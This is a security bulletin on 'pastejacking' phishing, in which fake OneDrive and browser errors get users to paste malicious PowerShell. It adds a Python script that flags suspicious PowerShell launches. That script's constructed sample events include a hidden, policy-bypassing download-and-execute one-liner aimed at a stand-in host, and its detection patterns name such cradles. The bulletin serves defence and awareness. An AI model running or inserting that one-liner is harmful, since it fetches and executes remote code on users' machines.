Threat Awareness – Another PowerShell “fix” Compromise via the Clipboard

Created: Tuesday, July 30, 2024 - 15:03
Categories: Cybersecurity

In the Security & Resilience Update on June 18, 2024, WaterISAC shared Proofpoint research on increased activity that uses unusual social engineering to direct users to copy and paste malicious PowerShell scripts, infecting their computers with malware. That campaign uses fake Google Chrome, Word, and OneDrive error messages to trick users into clicking a button that copies a PowerShell “fix” to the clipboard; when the user pastes and runs it, it installs malware. While the tactic requires significant user interaction, the social engineering ploy of a reputable site or service offering a “fix” is believed to prompt users to act without considering the risk.

Over the past few weeks, the Trellix Advanced Research Center observed an extremely similar phishing campaign targeting Microsoft OneDrive users. According to Trellix, users are tricked into clicking a button that purportedly explains how to fix a DNS issue, ostensibly to grant access to a file on Microsoft OneDrive. After the button is clicked, the user is led through the same steps described by Proofpoint, including copying the malicious PowerShell script from the clipboard and pasting it to “fix” the issue. Trellix has dubbed this technique “pastejacking.” For more details, visit Trellix.

Whether a clipboard-based attack is subtle or appears more technical in nature, as in the PowerShell examples, it is practical to make users aware of these lesser-known tactics. In addition, the following measures can help mitigate clipboard-based attacks:

  • Keep the clipboard clear. Regularly clear clipboard contents, especially after copying sensitive information.
  • Endpoint protections. Many reputable security solutions include features to detect and prevent malicious attempts to access or modify clipboard contents.
  • Right-size account access. Apply the principle of least privilege and restrict non-administrative users from executing PowerShell.
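One way to put the endpoint-detection bullet into practice is to hunt for the launch pattern pastejacking produces: PowerShell started from explorer.exe (which is what a paste into the Run box or Start menu yields) with switches that hide the window, bypass execution policy, or carry an encoded or downloaded payload. The script below is an added example, not code from WaterISAC, Proofpoint, or Trellix; the events are constructed, and the field names follow Sysmon process-creation events.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields),
# not telemetry from the Proofpoint or Trellix reports.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # pasted into the Win+R Run box, so explorer.exe is the parent
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr https://fix.example.invalid/dns.ps1)"'},
    # same launch path, payload carried as an encoded command (placeholder, not a real payload)
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -nop -enc PLACEHOLDERBASE64=="},
    # administrator running a maintenance script from a console: benign
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": r"powershell -File C:\ops\backup.ps1"},
    # explorer.exe parent but a plain interactive shell: not enough on its own
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh"},
]

# Command-line traits typical of pasted one-liners (PowerShell's abbreviated switches included).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+\S", re.I),
    "policy_bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(  # iex plus a fetch primitive, in either order
        r"(?=.*\b(?:iex|invoke-expression)\b)(?=.*\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient)\b)", re.I),
    "clipboard_read": re.compile(r"get-clipboard", re.I),
}

def assess_event(event):
    """Return (suspicious, matched indicator names) for one process-creation event."""
    image = event["Image"].lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return False, []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]
    # A Run-dialog or Start-menu launch gives explorer.exe as parent. That is normal by itself,
    # so it only alerts together with at least one trait; two or more traits alert regardless.
    from_explorer = event["ParentImage"].lower().endswith("\\explorer.exe")
    return (from_explorer and len(hits) >= 1) or len(hits) >= 2, hits

def find_pastejacking_candidates(events):
    """Indices of events worth an analyst's attention."""
    return [i for i, e in enumerate(events) if assess_event(e)[0]]

if __name__ == "__main__":
    for i in find_pastejacking_candidates(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["CommandLine"], assess_event(SAMPLE_EVENTS[i])[1])
```

Pair this with PowerShell script block logging (Event ID 4104) so the content of an encoded or downloaded payload is captured even when the command line only shows the cradle.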

Analyst comment (Jennifer Lyn Walker): Full disclosure, after looking into this and the previous analysis, I realized that Proofpoint also described the same “fix the DNS” lure as one of multiple fake errors in its analysis report. That said, given the social engineering component and sense of urgency and “technical” foolery this activity is using, I felt it was useful to emphasize this tactic and encourage members to incorporate this into security awareness training.